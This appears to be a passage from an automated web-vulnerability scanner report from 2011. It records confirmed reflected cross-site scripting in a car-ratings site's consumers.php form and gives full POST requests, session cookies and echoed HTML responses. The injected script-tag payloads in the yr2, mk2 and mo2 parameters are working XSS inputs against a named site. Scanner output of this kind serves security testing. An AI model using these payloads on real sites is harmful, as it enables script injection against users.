class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000E88)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000F62)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000F62)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="'"--></style></script><script>netsparker(0x000F62)</script>" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000FB4)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=ucd796b5je81rs2nedvc06vr12
Content-Length: 197
Expect: 100-continue
Accept-Encoding: gzip, deflate

Year=3&Make=3&numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000FB4)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:57:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td><td><select name="Model" id="Model" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000FB4)</script>" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="c..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
Year POST 3
Make POST 3
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000FE7)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
